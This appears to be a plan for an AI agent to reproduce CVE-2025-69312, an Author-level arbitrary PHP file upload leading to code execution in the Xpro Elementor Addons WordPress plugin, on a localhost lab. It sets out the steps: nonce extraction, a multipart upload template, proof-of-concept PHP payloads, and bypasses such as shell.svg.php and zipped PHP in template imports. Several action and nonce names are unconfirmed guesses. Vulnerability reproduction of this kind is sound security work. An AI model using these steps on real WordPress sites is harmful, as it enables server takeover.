Research Plan: CVE-2025-69312 - Xpro Elementor Addons Arbitrary File Upload

1. Vulnerability Summary

The Xpro Elementor Addons plugin (up to version 1.4.19.1) contains an unrestricted file upload vulnerability. The flaw exists because a specific AJAX handler, accessible to users with Author permissions and above, fails to validate the file extension or MIME type of uploaded files. This allows an authenticated attacker to upload malicious PHP scripts to the server, leading to Remote Code Execution (RCE).

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• Vulnerable Action: xpro_elementor_addons_upload_file or xpro_elementor_addons_import_template (inferred based on plugin functionality and common Elementor addon patterns).
• HTTP Method: POST (Multipart Form Data)
• Authentication: Required (Author-level role or higher).
• Parameters:
  • action: The AJAX action string.
  • nonce: A security token (likely required).
  • file / async-upload: The file payload containing PHP code.
• Preconditions: The attacker must have a valid account with at least the Author role.

3. Code Flow (Inferred)

1. Entry Point: The plugin registers an AJAX action for authenticated users via add_action( 'wp_ajax_...', ... ).
2. Handler Function: The function associated with the action (e.g., upload_file_handler) is called.
3. Nonce Verification: The code likely calls check_ajax_referer() or wp_verify_nonce().
4. Capability Check: The code may check current_user_can('upload_files') or current_user_can('edit_posts'). Since Authors have these capabilities by default, they pass the check.
5. Processing: The code retrieves the file from the $_FILES global.
6. Vulnerable Sink: The function calls wp_handle_upload() or move_uploaded_file() without providing a restrictive mimes allowlist or validating the extension against wp_check_filetype().
7. Storage: The file is saved into wp-content/uploads/xpro-addons/... or the standard media library directory.

4. Nonce Acquisition Strategy

Since the vulnerability is authenticated (Author+), the nonce is likely localized in the WordPress admin area or within the Elementor editor interface.

1. Identify the Localization: Search the codebase for wp_localize_script.
   • grep -r "wp_localize_script" .
2. Create a Test Page:
   • wp post create --post_type=page --post_status=publish --post_title="Xpro Test" --post_content="[xpro_template_dummy_shortcode]" (Exact shortcode to be identified via grep -r "add_shortcode" .).
3. Extract via Browser:
   • Login as an Author.
   • Navigate to the page or the Elementor editor.
   • Use browser_eval to find the nonce:
     • browser_eval("window.xpro_elementor_addons_js_data?.nonce") (inferred variable name).
     • Alternative: browser_eval("window.xpro_admin_ajax?.nonce").

5. Exploitation Strategy

Step 1: Discover the exact AJAX Action and Nonce Key

Search the plugin directory for file upload sinks and their associated hooks.

grep -r "wp_ajax_" .
grep -rE "move_uploaded_file|wp_handle_upload" .

Step 2: Prepare the Payload

Create a file named poc.php:

<?php echo "VULN_VERIFIED: " . php_uname(); ?>

Step 3: Execute the Upload Request

Using the http_request tool, send the following multipart request (assuming action xpro_elementor_addons_upload_image and nonce key xpro_nonce as placeholders):

Request Template:

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers:
  • Content-Type: multipart/form-data
  • Cookie: (Author user cookies)
• Body (Multipart):
  • action: xpro_elementor_addons_upload_image (to be confirmed)
  • nonce: [EXTRACTED_NONCE]
  • file: poc.php (Content: <?php phpinfo(); ?>)

Step 4: Locate the Uploaded File

The response will likely contain the URL or path of the uploaded file. If not, check common paths:

• http://localhost:8080/wp-content/uploads/xpro-addons/poc.php
• http://localhost:8080/wp-content/uploads/[YEAR]/[MONTH]/poc.php

6. Test Data Setup

1. Install Plugin: Ensure xpro-elementor-addons version 1.4.19.1 is active.
2. Create User:

   wp user create attacker attacker@example.com --role=author --user_pass=password
   

3. Identify Shortcode/Widget:

   grep -rn "add_shortcode" .
   

   (e.g., If [xpro_portfolio] is found, create a page with it to trigger script loading).

7. Expected Results

• Upload Response: A JSON response indicating success, often returning an ID or a URL: {"success":true,"data":{"url":".../poc.php"}}.
• Execution: Accessing the URL of the uploaded PHP file returns the output of phpinfo() or the php_uname() string.

8. Verification Steps

1. Check Filesystem:

   find /var/www/html/wp-content/uploads -name "poc.php"
   

2. HTTP Check:
   Use http_request to GET the path of the discovered file and check for the string VULN_VERIFIED.

9. Alternative Approaches

• If wp_handle_upload is used with filters: Check if the plugin overrides the upload_mimes filter globally during the AJAX call.
• Template Import: If the vulnerability is in a "Template Import" feature, try uploading a .zip file containing a .php file, or a JSON file with embedded PHP if the plugin extracts or includes it.
• SVG Uploads: If the plugin specifically allows SVG but doesn't sanitize, try uploading an SVG with a <script> tag or a file named shell.svg.php.